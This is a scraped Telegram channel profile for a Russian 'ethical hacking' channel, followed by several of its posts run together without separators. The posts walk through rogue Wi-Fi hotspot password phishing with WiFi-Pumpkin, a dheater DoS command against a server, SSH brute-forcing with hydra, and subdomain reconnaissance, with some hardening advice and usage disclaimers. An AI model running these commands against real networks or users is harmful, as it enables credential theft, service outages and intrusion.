CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Больше📈 Аналитический обзор Telegram-канала CodeGuard: PySec Edition
Канал CodeGuard: PySec Edition является активным участником. Сейчас сообщество объединяет 14 198 подписчиков, занимая 8 713 место в категории Технологии и приложения и 45 538 место в регионе Россия.
📊 Показатели аудитории и динамика
С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 14 198 подписчиков.
Согласно последним данным от 30 сентября, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 898, а за последние 24 часа — 19, при этом общий охват остаётся высоким.
- Статус верификации: Не верифицирован
- Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 9.79%. В первые 24 часа после публикации контент обычно набирает 5.46% реакций от общего числа подписчиков.
- Охват публикаций: В среднем каждый пост получает 1 390 просмотров. В течение первых суток публикация набирает 775 просмотров.
- Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 5.
- Тематические интересы: Контент сосредоточен на ключевых темах, таких как codeguard, pysec, docker, grep, контейнер.
📝 Описание и контентная политика
Автор описывает ресурс как площадку для выражения субъективного мнения:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Благодаря высокой частоте обновлений (последние данные получены 01 октября, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.
sudo apt install git isc-dhcp-server
git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
sudo ./installer.sh --install
Запуск:
sudo wifi-pumpkin
⚠️ Если выдаёт ошибку BadDrawable — добавь в /etc/environment строку:
QT_X11_NO_MITSHM=1
🎯 Как это работает?
1. Создаёшь свою точку доступа
Например: Free_WiFi, Starbucks, Airport_Hotspot
2. Жертва подключается
Устройство автоматически или вручную соединяется с твоей сетью
3. Ты становишься шлюзом
Весь трафик проходит через тебя
4. Запускаешь модули:
- Phishing Manager — показываешь фейковую страницу (например, "введите пароль")
- DNS Spoof — подменяешь google.com на свой сайт
- Proxy — внедряешь JS (например, hook в BeEF)
- BDFProxy — модифицируешь .exe-файлы на лету (backdoor)
🧪 Пример: фишинг пароля
1. Запускаешь WiFi-Pumpkin
2. Настраиваешь SSID: Company_WiFi
3. Включаешь Phishing Manager → выбираешь шаблон (например, "Captive Portal")
4. Жертва подключается → видит "подключение к сети" → вводит логин и пароль
5. Данные попадают к тебе
⚠️ Важно: ты же знаешь что мы здесь не что бы вредить, а чтобы учиться и развиваться?)
- Используй только в этичных целях
- Только на своей сети или с разрешения
- Не для взлома, а для защиты
WiFi-Pumpkin — не "волшебная палочка", а инструмент, который требует понимания.
📱 GitHub
💀 Документация на kali.tools
😈 CodeGuard | #security #wifi #pentestingpip install dheater
dheat --protocol tls example.com
или
docker run --tty --rm coroner/dheater --protocol tls example.com
+ опция --thread-num для усиления нагрузки.
Инструмент создан на базе CryptoLyzer — анализатора криптографических настроек серверов.
👉Подробнее: [dheatattack.com/dheater]
📱Исходники: GitHub
💡 Вывод:
Безопасность — это не только шифрование.
Иногда достаточно просто заставить сервер считать.
Ставь реакцию:
👍 - сложное и не понятное, я не понимаю о чем пост, пока что...
♥️- да, я врубаю что происходит, это атака на вычислительную систему с целью довести её до отказа
😈 CodeGuard | #DoS #pentest #infosecnmap: обнаружение хостов, определение версий сервисов, поиск уязвимостей через скрипты.
5. Получение доступа: Metasploit и эксплоиты
Как использовать msfconsole, msfvenom, EternalBlue, bind/reverse shell и обходить брандмауэры.
6. Повышение привилегий
Из обычного пользователя — в root. Linux и Windows. Теория и практика.
7. Закрепление в системе
Как остаться незамеченным: бэкдоры, persistence, маскировка под легитимные процессы.
8. Внешняя разведка
Сбор данных через открытые источники: WHOIS, DNS, Google Dorks, социальные сети.
💡 Автор не просто рассказывает — он проводит вас по шагам реальной атаки, как если бы вы были на месте хакера. Но с одной разницей: вы делаете это этично, в лаборатории, в целях защиты.
🔵 Всё бесплатно.
🔵 На русском.
🔵 С живыми скриншотами и командами.
😈 CodeGuard | #infosec #ИБ #hacking #KaliLinux22 (SSH)
- Имя пользователя (часто admin, root, user)
- Словарь паролей (например, rockyou.txt)
- Инструмент: hydra, medusa или metasploit
🛠 Как это работает
1. Атакующий сканирует сеть:
nmap -p 22 192.168.1.0/24
2. Находит сервер с открытым SSH.
3. Запускает перебор:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 ssh
4. Через минуты или часы — находит пароль:
[DATA] attacking ssh://192.168.1.10:22/ [22][ssh] host: 192.168.1.10 login: admin password: admin5. Подключается:
ssh admin@192.168.1.10
❗️ Почему это работает?
- Пароли вроде admin, 123456, password — до сих пор используются
- Нет защиты от брутфорса (fail2ban, limit на попытки)
- Root-доступ разрешён по паролю
- SSH-порт открыт наружу
🛡 Защита, просто да жути)
1. Никогда не используйте стандартные логины и пароли
→ admin:admin — это приглашение к взлому.
2. Используйте длинные, сложные пароли
→ Или лучше — ключи SSH без паролей (passphrase).
3. Отключите вход по паролю, оставьте только по ключу
В /etc/ssh/sshd_config:
PasswordAuthentication no
4. Смените порт SSH (не обязательно, но помогает от шумеров) (отправь пост знакомому шумеру)))
Port 2222
5. Настройте fail2ban
→ Блокирует IP после нескольких неудачных попыток.
6. Ограничьте доступ по IP (если возможно)
→ Разрешайте SSH только с доверенных адресов.
💡Вывод
SSH — мощный инструмент, но он не защищает сам себя.
Если пароль слабый — сервер уже не ваш.
Узнав, как можно получить доступ, ты сможешь построить защиту, которая выдержит атаку.
😊 Ставь реакцию - это просто для тебя, а мне мотивация пилить контент
😈 CodeGuard | #pentest #linux #ethicalhackingadmin.company.com, dev.company.com, api.company.com — это не просто красивые имена. Это возможные точки входа, часто слабо защищённые, забытые, уязвимые.
Поясняю, то есть может быть известный сайт - codeguad.com, он хорошо защищен и все классно, НО если перейти на станицу admin.codeguard.com и окажется что на нем открыть phpinfo(), все может плохо закончиться.
p.s не забудь что бы использовать инструменты - их нужно установить. Как? можно уточнить в чате - t.me/codeguard_chat, я уверен ребята подскажут))
🔍Почему субдомены — это важно?
- Часто они не входят в основной scope компании → им уделяют меньше внимания
- Могут работать на старых версиях CMS, фреймворков
- Иногда открыты для публичного доступа (например, тестовые среды)
- Могут содержать .git, .env, бэкапы, API-ключи
🧰Как искать субдомены? Инструменты и методы:
1. Subfinder — сбор из множества источников
Собирает субдомены из:
- SSL-сертификатов (CertSpotter, Censys)
- DNS-провайдеров
- Публичных баз данных
subfinder -d company.com -o subdomains.txt
Используй с флагом -all, чтобы включить все источники.
2. Assetfinder — находит связанные домены
Отлично работает с SSL-сертификатами и часто находит то, что пропускают другие.
assetfinder --subs-only company.com >> subdomains.txt
3. Amass — глубокая разведка
Один из самых мощных инструментов от OWASP.
amass enum -d company.com -o amass.txt
Работает медленно, но даёт максимум данных.
4. Sudomy — автоматизация всей разведки
Не просто ищет субдомены — анализирует их:
- Проверяет, живые ли хосты
- Находит директории (через ffuf)
- Сканирует порты
- Извлекает JS-файлы и ищет в них эндпоинты
sudomy -d company.com
5. GAU / Katana — сбор URL и JS-файлов
GAU (GetAllUrls) — берёт ссылки из:
- Wayback Machine
- Common Crawl
- AlienVault
gau company.com | grep "\.js" | httpx -silent
Katana — современная замена GAU, с поддержкой JS-анализа:
katana -u company.com -d 3 -jc -o katana_urls.txt
-jc — извлекает ссылки из JavaScript
-d 3 — глубина сканирования
✅ Что делать после сбора?
1. Объедини все списки:
cat subfinder.txt amass.txt assetfinder.txt | sort -u > merged.txt
2. Проверь, какие хосты отвечают:
cat merged.txt | httpx -silent -status-code -title -tech-detect > live.txt
3. Найди интересные:
grep -i "admin\|login\|dev\|staging\|api" live.txt
4. Проверь на утечки:
echo "dev.company.com" | gau | grep -i "\.git\|\.env\|backup"
💡Советы
- Не используй один инструмент — комбинируй
- Всегда фильтруй результаты (убирай мусор)
- Проверяй JS-файлы — там часто прячутся API
- Ищи wildcard-домены — они могут маскировать уязвимости
- Документируй всё — это пригодится в отчёте
📌 Субдомены — это ключ к периметру. Чем больше их найдёшь — тем выше шанс найти дыру.
Бро, не забудь поставить реакцию 👍
😈 CodeGuard | #subdomains #pentesting #bugbounty💻 Атака сетей на уровне протоколов Автор: Джеймс Форшоу Год издания: 2021Если ты хочешь не просто сканировать сети, а понимать, как устроены протоколы изнутри — эта книга станет твоим главным руководством. Не про поверхностные атаки. Про глубокий анализ, перехват трафика и эксплуатацию уязвимостей на низком уровне. 🧠Что внутри? - Как перехватывать и анализировать сетевой трафик - Разбор пользовательских протоколов: от заголовков до полезной нагрузки - Поиск уязвимостей в реализации протоколов - Эксплуатация буферных переполнений, RCE, DoS - Справочник по сетевой безопасности и архитектуре - Практические примеры: от проприетарных протоколов до IoT-устройств - Использование Canape Core — инструмента от автора для создания своих фреймворков 🔝 Подходит: - Специалистам по пентестингу, которые хотят выйти за рамки стандартных инструментов - Разработчикам, проверяющим безопасность своих протоколов - Реверс-инженерам и исследователям уязвимостей - Всем, кто хочет понять, как данные путешествуют по сети — и как их можно перехватить 💡Почему это важно? Большинство атак на систему начинаются не с веб-интерфейса, а с протокола, который считается "безопасным" или "внутренним". Эта книга учит видеть слабые места там, где другие даже не смотрят. 🛠 А ещё — Canape Core Автор даёт не только теорию. Он предоставляет Canape Core — свою библиотеку для анализа и тестирования протоколов. 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #pentesting #networking
